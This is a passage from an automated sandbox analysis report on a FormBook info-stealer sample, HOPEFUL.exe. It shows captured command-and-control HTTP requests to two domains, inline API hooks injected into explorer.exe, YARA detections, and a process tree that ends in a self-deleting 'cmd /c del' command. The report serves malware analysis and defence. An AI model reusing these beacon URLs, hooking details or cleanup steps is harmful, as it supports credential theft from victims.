                                                                                    Jan 13, 2021 21:49:44.124205112 CET7340OUTGET /jqc/?ndlpiZc=0xbExnfI3Prv/1KpQ0CN/ByOc92DgA9UHu9nxr7GrQjbPgIXGkWI8+X1opataUjCpyTL&vJBt9=0p-TOvv8KBuxgpiP HTTP/1.1
                                                                                    Host: www.registeredagentfirm.com
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    Jan 13, 2021 21:49:44.263031006 CET7340INHTTP/1.1 403 Forbidden
                                                                                    Server: openresty
                                                                                    Date: Wed, 13 Jan 2021 20:49:44 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 275
                                                                                    ETag: "5ffc8396-113"
                                                                                    Via: 1.1 google
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    2192.168.2.349759174.136.37.10980C:\Windows\explorer.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    Jan 13, 2021 21:50:04.808011055 CET7341OUTGET /jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=EnI9If5tS4P3VQhtW/9J+s0mIpyxI+H/HK4ULnRjNfqJIxJ/UO/Pi364qc4j+Eh6gi9p HTTP/1.1
                                                                                    Host: www.tiendazoom.com
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    Jan 13, 2021 21:50:04.984437943 CET7342INHTTP/1.1 404 Not Found
                                                                                    Date: Wed, 13 Jan 2021 20:50:04 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 315
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Code Manipulations

                                                                                    User Modules

                                                                                    Hook Summary

                                                                                    Function NameHook TypeActive in Processes
                                                                                    PeekMessageAINLINEexplorer.exe
                                                                                    PeekMessageWINLINEexplorer.exe
                                                                                    GetMessageWINLINEexplorer.exe
                                                                                    GetMessageAINLINEexplorer.exe

                                                                                    Processes

                                                                                    Process: explorer.exe, Module: user32.dll
                                                                                    Function NameHook TypeNew Data
                                                                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE0
                                                                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE0
                                                                                    GetMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE0
                                                                                    GetMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE0

                                                                                    Statistics

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Start time:21:47:39
                                                                                    Start date:13/01/2021
                                                                                    Path:C:\Users\user\Desktop\HOPEFUL.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\Desktop\HOPEFUL.exe'
                                                                                    Imagebase:0xa40000
                                                                                    File size:3437056 bytes
                                                                                    MD5 hash:9C15AF175868121CC014666189D52DAE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Reputation:low

                                                                                    General

                                                                                    Start time:21:48:12
                                                                                    Start date:13/01/2021
                                                                                    Path:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                                    Imagebase:0xde0000
                                                                                    File size:42080 bytes
                                                                                    MD5 hash:F2A47587431C466535F3C3D3427724BE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Antivirus matches:
                                                                                    • Detection: 0%, Metadefender, Browse
                                                                                    • Detection: 0%, ReversingLabs
                                                                                    Reputation:moderate

                                                                                    General

                                                                                    Start time:21:48:20
                                                                                    Start date:13/01/2021
                                                                                    Path:C:\Windows\explorer.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:
                                                                                    Imagebase:0x7ff714890000
                                                                                    File size:3933184 bytes
                                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    General

                                                                                    Start time:21:48:37
                                                                                    Start date:13/01/2021
                                                                                    Path:C:\Windows\SysWOW64\cmmon32.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                                                                    Imagebase:0x1040000
                                                                                    File size:36864 bytes
                                                                                    MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Reputation:moderate

                                                                                    General

                                                                                    Start time:21:48:42
                                                                                    Start date:13/01/2021
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:/c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
                                                                                    Imagebase:0xbc0000
                                                                                    File size:232960 bytes
                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    General

                                                                                    Start time:21:48:42
                                                                                    Start date:13/01/2021
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff6b2800000
                                                                                    File size:625664 bytes
                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    Disassembly

                                                                                    Code Analysis

                                                                                    Reset < >